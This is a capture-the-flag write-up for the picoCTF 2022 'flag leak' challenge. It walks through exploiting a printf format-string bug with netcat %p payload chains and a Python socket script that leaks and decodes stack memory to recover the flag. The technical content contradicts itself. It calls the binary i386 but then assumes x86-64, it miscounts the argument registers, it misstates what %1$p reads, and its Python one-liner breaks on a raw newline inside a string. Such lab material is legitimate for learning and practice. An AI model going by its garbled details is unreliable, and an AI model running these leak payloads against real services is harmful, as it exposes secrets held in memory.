flag leak picoCTF 2022 Solution

Published: July 20, 2023

Description

The binary calls printf(user_input) directly instead of printf("%s", user_input). This format-string vulnerability allows you to read arbitrary data off the stack - including the flag stored as a local variable.

Connect via netcat. No binary download is required.

Send format-string specifiers to leak stack values and find the flag.

bash
nc saturn.picoctf.net <PORT_FROM_INSTANCE>
  1. Step 1Understand the format-string vulnerability
    printf(user_input) interprets user input as a format string. %p reads pointer-sized values from the stack; %s dereferences a stack value as a string pointer.
    Learn more

    printf reads additional arguments from the stack (or registers on x86-64) based on format specifiers in its first argument. When user input IS the format string, the attacker controls which values get read.

    Common specifiers for leaking:

    • %p - print a pointer-sized value in hex. Safe; won't crash from invalid addresses.
    • %s - dereference the value as a char* and print as a string. Can crash if the value is not a valid pointer.
    • %x - print as unsigned hex (32-bit on 32-bit, sign-extended on 64-bit).
    • %n$p - print the Nth argument (direct parameter access, e.g., %3$p skips to the 3rd value on the stack).

    The flag is stored as a local variable (likely a char array on the stack) in the calling function. It will appear as either a printable string via %s, or as raw bytes readable via a chain of %p specifiers.

  2. Step 2Leak the stack with %p chains
    On x86-64 the first stack-resident format-string argument lives at %6$p (rdi/rsi/rdx/rcx/r8/r9 carry the first six). Walking %1$p through %30$p safely covers the local-variable region without straying past it.
    bash
    echo '%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p' | nc saturn.picoctf.net <PORT_FROM_INSTANCE>
    bash
    echo '%s' | nc saturn.picoctf.net <PORT_FROM_INSTANCE>
    Learn more

    How printf walks arguments on i386 (this binary). All variadic args sit on the stack starting at [esp+4] (the format string itself is at [esp]). Each %p consumes 4 bytes:

    vuln() at the printf(user_input) call:
      [esp+0x00] -> &user_input          <- the format string itself
      [esp+0x04] -> arg1   <- %p / %1$p
      [esp+0x08] -> arg2   <- %p / %2$p
      ...
      [esp+0x40] -> flag[0..3]  <- 0x6f636970 ("pico")
      [esp+0x44] -> flag[4..7]  <- 0x7b465443 ("CTF{")
      [esp+0x48] -> flag[8..11]
      ...

    On x86-64, the first 5 variadic args after the format string come from rsi, rdx, rcx, r8, r9; from arg6 onward they live on the stack starting at [rsp]. So %6$p on x86-64 is the first stack-resident slot.

    Decoding the leak (concrete worked example). Suppose your %p dump produces:

    %17$p = 0x6f636970   bytes 70 69 63 6f -> "pico"
    %18$p = 0x7b465443   bytes 43 54 46 7b -> "CTF{"
    %19$p = 0x6b34336c   bytes 6c 33 34 6b -> "l34k"
    %20$p = 0x676e1535   bytes 35 15 6e 67 -> "5\x15ng"  (truncated)

    Each 4-byte hex value reverses to a 4-character ASCII chunk (little-endian). Concatenating in order yields the flag. The 0x7d byte (}) marks the end. If a chunk is partially garbled, retry with more %ps or use %n$s to dereference the slot as a string pointer.

    Why %s is risky. %s dereferences the stack slot as a char*. If the slot is not a valid pointer, printf segfaults. Use %p first to identify slots whose values look like reasonable addresses (e.g., 0x080xxxxx in a 32-bit non-PIE binary), then switch to %s on those.

  3. Step 3Decode the leaked bytes to reconstruct the flag
    Each %p prints a 64-bit value. On a little-endian box, the low-address byte appears at the right of the hex; reverse the bytes to read ASCII left to right.
    python
    python3 -c "
    import socket
    
    s = socket.socket()
    s.settimeout(5)
    s.connect(('saturn.picoctf.net', 0))  # replace 0 with PORT_FROM_INSTANCE
    banner = s.recv(1024)
    if not banner:
        raise RuntimeError('connection closed before banner')
    payload = '.'.join([f'%{i}$p' for i in range(1, 30)]) + '
    '
    s.send(payload.encode())
    data = s.recv(4096)
    if not data:
        raise RuntimeError('no leak received - server closed')
    s.close()
    
    # Parse and decode each 8-byte chunk; try little-endian first, fall back to big-endian.
    for val in data.decode().split('.'):
        val = val.strip()
        if not val.startswith('0x'):
            continue
        try:
            raw = bytes.fromhex(val[2:].zfill(16))
        except ValueError:
            continue
        le = raw[::-1].decode('latin-1')
        be = raw.decode('latin-1')
        pick = le if sum(c.isprintable() and not c.isspace() for c in le) >= sum(c.isprintable() and not c.isspace() for c in be) else be
        if any(c.isprintable() and not c.isspace() for c in pick):
            print(repr(pick))
    "
    Learn more

    A 64-bit value such as 0x4654436f636970 on a little-endian box stores its lowest byte first in memory. The bytes in address order are 70 69 63 6f 43 54 46 00 (zero-padded to 8 because the top byte was zero). Reversing the hex string and slicing into bytes 70 69 63 6f 43 54 46 gives the ASCII picoCTF directly, so raw[::-1].decode() in the script reconstructs the flag characters in source order. A big-endian fallback covers the rare case where the binary or libc has been compiled for a non-x86 host.

    The script targets exactly range(1, 30): position 1 is the format string itself, positions 2-5 land in the System V argument registers (rsi/rdx/rcx/r8/r9), and from position 6 onward you walk the stack. Twenty-four stack slots is plenty to cover the local flag buffer in this binary; pushing past 30 risks reading past the saved frame and into uninitialised memory whose decoded bytes only add noise.

    Format-string bugs can also write to memory via %n (the number of bytes printed so far is stored at the pointer slot). For read-only leak challenges like this one, %p chains plus selective %s on slots that look like valid pointers is the entire toolkit. For the broader pattern set see Format string vulnerabilities for CTF and the script-driven workflow in pwntools for CTF.

Flag

picoCTF{L34k1ng_Fl4g_0ff_St4ck_...}

Send a chain of %p specifiers to dump stack values. Decode the hex output as little-endian ASCII to find the flag stored on the stack.

Want more picoCTF 2022 writeups?

Useful tools for Binary Exploitation

Related reading

What to try next